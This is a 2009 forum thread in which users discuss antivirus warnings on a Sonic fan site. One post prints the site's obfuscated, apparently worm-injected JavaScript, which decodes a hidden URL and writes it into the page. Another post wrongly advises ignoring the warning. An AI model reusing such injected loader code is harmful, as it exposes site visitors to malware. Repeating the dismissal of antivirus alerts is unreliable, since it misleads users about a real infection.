don't click here

SOST is full of viruses

Discussion in 'General Sonic Discussion' started by MathUser, Nov 15, 2009.

Thread Status:
Not open for further replies.
  1. MathUser

MathUser

3rd top wiki contributor Researcher
    When I go to SOST nowdays AVG attempts to block access to it for some reason. This is the screen I get when accesing the site:

[​IMG]

2. Blue Blood

Blue Blood

Haha, yes. This was mentioned a week or two ago. Dunno how long they've been there for, but it's quite annoying.

3. Just went there to test it it out. You're not the only one getting them.

4. Spanner

Spanner

The Tool Member
    Andy Wolan is too busy (EDIT - Inflammatory - T) playing softball to fix the entire Emulation Zone. :(
    I believe that GerbilSoft downloaded the entire SOST for wiki images though. If SOST is still required perhaps permission could be sought to host it elsewhere?

5. Phos

Phos

Going for the high score on whatever that little b Member
    Getting them with Avast as well.

6. Skyler

Skyler

Neonネオン Cowgirlカウガール Site Staff
    Hellafornia
    The next audtion
    Hasn't the site been long since abandoned by Rlan for a few years now? That could be a contributing cause.

7. Cooljerk

Cooljerk

NotEqual Tech, Inc - VR & Game Dev Oldbie
    I've offered to maintain it for Rlan 3 or 4 times and he always says he'll consider it, then never gets back to me. Rlan indeed has abandoned the site, and he said his intention is to make a sister site that is like Sost, but more generalized (I.e. not necessarily about sonic, sort of like how Sonic Cult became Hacking Cult).

I'd still be down to maintain it, though.

8. Don't you mean "how Sonic Cult became X-Cult" ?

9. Cooljerk

Cooljerk

NotEqual Tech, Inc - VR & Game Dev Oldbie
    Er, right. Too many cults to keep up with.

10. Revival

Revival

The AppleTalk Network System Member
    It's because the small amount of javascript at SoST is obfuscated. As a result of this, anti-virus programs will fire a warning in case the obfuscated javascript is an XSS exploit in disguise or whatever. Ignore the warning.

11. Digital Xeron

Digital Xeron

[An error occurred while processing this custom ti Oldbie
    Unicomplex One, Canada
    Digibase Operations (TSZP)
    I have to agree, possibly to make ad blocking more difficult, it is also possible the same code has been used on malware sites, thus setting off AV software as some malware (and associated websites) use code that's extremely similar to legitimate code to make it all that much more difficult for AV software to blacklist without effecting legitimate software and websites.

12. Quexinos

Quexinos

Since 1997 Oldbie
    Well wow thanks for the warning, even though I'm on Linux I won't be going there any time soon.

13. Revival

Revival

The AppleTalk Network System Member
    I decided to make sure that the reason for the warning was obfuscated javascript, and it seems so:
    Code (Text):
    1. function urb(GihZlaf){var XNoZdYIaJq=7,qtTAU=8;var YxseDmCjJ='86+5,53+3,34+1,91+0,101+4,101+4,98+0,50+6,41+1,41+1,101+4,84+7,98+0,91+7,99+
    2. 6,97+1,101+4,88+3,96+2,40+2,91+7,96+2,89+2,97+1,41+1,94+4,91+7,96+2,40+2,86+5,90+
    3. 1,91' +
    4. '7,55+1,92+6,106+6,97+1,34+1,54+2,52+4,41+1,91+7,89+2,99+6,84+7,95+3,88+3,54+
    5. 2,',mGnbjgWJ=YxseDmCjJ.split(',');youWKW='';
    6. for(dJC=0;dJC<mGnbjgWJ.length-1;dJC++){ vHFjYLk=mGnbjgWJ[dJC].split('+');
    7. FUGSFoNTNh = parseInt(vHFjYLk[0]*qtTAU)+parseInt(vHFjYLk[1]);FUGSFoNTNh = parseInt(FUGSFoNTNh)/XNoZdYIaJq;youWKW += String.fromCharCode(FUGSFoNTNh);}return youWKW;}
    8. document['wri5te'.replace(/[0-9]/,'')](RXWtGlQ('GWbkhEiw')+urb('vvAWXu'));
    Take a look at the coding for that function. There isn't even proper spacing.

EDIT: Wow, there's actually 2 functions hidden within that code. I've spaced it just enough to stop it stretching the tables.

14. Andeh

Andeh

Derp herp. Oldbie
    God, that's horrible, I could never write code like that. I need whitespace.

15. Overlord

Overlord

Now playable in Smash Bros Ultimate Moderator
    Long-term happiness
    What's the point of the obfuscation anyway? The worst that could happen is someone uses his javascript on their own site - OH GOD NO? =P

16. Shadix

Shadix

Oldbie
    Rlan sure does have a habit of starting up pretty popular sites and then abandoning them. :\

17. GerbilSoft

GerbilSoft

RickRotate'd. Administrator
    USA
    rom-properties
    That script wasn't added deliberately. A search for the function name results in lots of hits regarding XSS exploits, so I'm guessing some worm managed to exploit a vulnerability in the site and inject the malicious javascript into the page.

Thread Status:
Not open for further replies.